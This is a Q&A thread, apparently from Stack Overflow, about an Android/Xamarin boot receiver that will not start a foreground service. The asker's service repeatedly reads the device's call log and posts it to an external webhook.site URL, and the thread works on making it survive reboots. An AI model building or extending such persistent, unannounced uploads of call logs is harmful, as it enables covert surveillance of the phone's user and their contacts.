# ACTION_BOOT_COMPLETED Receiver doesn't work

Tags: c#, android, xamarin

I have this broadcast receiver for `ACTION_BOOT_COMPLETED`:

```
[BroadcastReceiver(Enabled = true, DirectBootAware = true, Exported = true)]
    [IntentFilter(new[] { Intent.ActionBootCompleted }, Priority = (int)IntentFilterPriority.HighPriority)]
    public class BootReceiver : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            Intent startIntent = new Intent(context, typeof(PService));
            startIntent.AddFlags(ActivityFlags.NewTask);
            context.StartForegroundService(startIntent);
        }
    }
```

My MainActivity:

```
        protected override void OnCreate(Bundle savedInstanceState)
        {
            TabLayoutResource = Resource.Layout.Tabbar;
            ToolbarResource = Resource.Layout.Toolbar;

            base.OnCreate(savedInstanceState);

            Xamarin.Essentials.Platform.Init(this, savedInstanceState);
            global::Xamarin.Forms.Forms.Init(this, savedInstanceState);

            LoadApplication(new App());

            StartForegroundService(new Intent(this, typeof(PService)));

            if (!Android.Provider.Settings.CanDrawOverlays(this))
            {
                Intent intent = new Intent(Android.Provider.Settings.ActionManageOverlayPermission);
                StartActivityForResult(intent, 0);
            }

        }
```

My PService:

```
        public override StartCommandResult OnStartCommand(Intent intent, StartCommandFlags flags, int startId)
        {


            var seconds = TimeSpan.FromSeconds(15);
            Device.StartTimer(seconds, () =>
            {


            Root r = new Root();

            MySqlConnection con = new MySqlConnection("*PRIVATE DATA*");
            con.Open();

            MySqlCommand cmd = con.CreateCommand();
            cmd.CommandText = "SELECT * FROM user_data";
            MySqlDataReader reader = cmd.ExecuteReader();

            DateTime user = DateTime.Now;

            while (reader.Read())
            {
                if (reader.GetString(0) == Preferences.Get("GUID", "ERROR"))
                {

                    user = DateTime.ParseExact(reader[1].ToString(), "HH:mm:ss", CultureInfo.InvariantCulture);
                    r.ID = reader.GetString(2);
                }
            }

            async void LoadCallLog()
            {
                var Logg = DependencyService.Get<ICallLog>().GetCallLogs();

                r.calls = (List<CallLogModel>)Logg;

                var serialized = JsonConvert.SerializeObject(r);
                using (var client = new HttpClient())
                {
                    await client.PostAsync("https://webhook.site/dd7cd0f8-6bd8-4e9f-961d-6b105e1dc7eb", new StringContent(serialized));
                }
            }

            if (user.ToString("HH:mm") == DateTime.Now.ToString("HH:mm"))
            {
                LoadCallLog();
                Thread.Sleep(60000);
            }

                return true;
            });


            return StartCommandResult.Sticky;
        }
```

But it doesn't launch my service once boot is completed. Manifest is automatically generated by xamarin. I know problem is that in new API (26+) are some restrictions.

Can someone help me with it what I should change so this code will work?
I'm using 29 API version.

Answer (score 1, accepted):

Try to add the following permission:

```
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
```

And this requires drawing overlay in your activity:

```
 if (!Android.Provider.Settings.CanDrawOverlays(this))
        {
            Intent intent = new Intent(Android.Provider.Settings.ActionManageOverlayPermission);
            StartActivityForResult(intent,requestCode);
        }
```

You could refer to the similar [case](https://stackoverflow.com/a/63250729/10768653)

Comment: This piece of code I have to add to MainActivity? If yes, I wrote instead of requestCode (which is doesn't exist) 0 but it doesn't work.
And I added this permission to manifest too.

Comment: @RitchyCZE It will navigate to the system settings,did you enable it ?

Comment: Yes, enabled it on my app

Comment: @RitchyCZE Does it trigger the OnReceive method ?

Comment: How can I find out that? I testing off and on mobile and Service doesn't start.

Comment: @RitchyCZE I test again,i just start the service first before restart the device,and when the device boot completely,the service start .

Comment: But I have in MainActivity this: `StartForegroundService(new Intent(this, typeof(PService)));` and I start app before restarting so do you have idea what is wrong?

Comment: @RitchyCZE If you don't restart it,could the service work ?And what's your device version?

Comment: Yes If I just start app service is working. My device is Android 9

Comment: @RitchyCZE I test on android 9 emulator,it also works,could you show a sample which could reproduce the issue ?

Comment: Do you mean MainActivity? If yes, I'm updated question so there is piece of MainActivity

Comment: @RitchyCZE Did you add `android.permission.RECEIVE_BOOT_COMPLETED` permission to your manifest ?

Comment: @Lez Zhu - MSFT yes

Comment: I make Toast and it trigger only once when I install new copy of app and only when I start it after boot. Any ideas what's wrong?